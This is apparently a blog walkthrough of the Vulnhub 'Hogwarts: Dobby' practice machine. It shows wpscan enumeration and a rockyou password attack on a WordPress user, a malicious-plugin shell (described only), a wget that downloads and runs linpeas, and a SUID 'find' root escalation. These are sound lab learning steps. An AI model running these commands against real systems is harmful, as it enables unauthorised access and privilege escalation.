Vulnhub - HOGWARTS: DOBBY
Introduction
dobby needs to be root to help harry potter, dobby needs to be a free elf
Difficult: Easy
This works better in VirtualBox
This is HOGWARTS: DOBBY from Vulnhub.
Ports
HTTP only; makes targeting easier.
HTTP and Rabbits
This one has a few rabbitholes, or at least red herrings. The page title on the website homepage is:
Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
This decodes to:
too easy no? Potter
This doesn’t appear to be useful for anything.
At the very bottom of the page in the source code is a comment:
See: /alohomora
If we go there, we get a message:
Draco’s password is his house ;)
Gobuster
Gobuster finds a directory called /log. It says:
pass:OjppbGlrZXNvY2tz
hint –> /DiagonAlley
The base64 encoded string decodes to:
::ilikesocks
This doesn’t appear to be useful for anything.
Going to /DiagonAlley, we find a Wordpress installation. Maybe we’re getting somewhere?
wpscan
Enumerate with:
wpscan -e --url http://192.168.1.143/DiagonAlley/
And we have one user, draco. We find a post entitled Dobby that is written in what appears to be brainfuck, but running it through an interpreter only yields what might be a partial password - this is another distraction. Let’s run a password attack:
wpscan --url http://192.168.1.143/DiagonAlley/ -U 'draco' -P /usr/share/wordlists/rockyou.txt
Success:
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - draco / slytherin
Trying draco / slytherin Time: 00:18:42 < > (14930 / 14359323) 0.10% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: draco, Password: slytherinApparently the hint from /alohomora wasn’t a red herring. Whatever.
Wordpress
The installation is in Spanish (I think) so it’s a bit hard to read but I can upload a malicious plugin as a zip file (see midnight for details). This gets me a shell.
Privesc
As usual, run linpeas from /dev/shm after upgrading my shell:
www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ which python3
which python3
/usr/bin/python3
www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<in$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ cd /home
www-data@HogWarts:/home/dobby$ cd /dev/shm
cd /dev/shm
www-data@HogWarts:/dev/shm$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
<ion-awesome-scripts-suite/master/linPEAS/linpeas.sh
--2020-11-14 08:35:43-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.80.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.80.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 297851 (291K) [text/plain]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 290.87K --.-KB/s in 0.05s
2020-11-14 08:35:44 (5.41 MB/s) - ‘linpeas.sh’ saved [297851/297851]
www-data@HogWarts:/dev/shm$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@HogWarts:/dev/shm$ ./linpeas.sh
./linpeas.shThis gives us not one but two SUID binaries of interest - base32 and find. We’ll take find as per GTFOBins
www-data@HogWarts:/dev/shm$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# whoami
whoami
root
# less proof.txt
less proof.txt
root{63a9f0ea7bb98050796b649e85481845!!}This box didn’t have cat but it still had head and less so no problem. Done and done.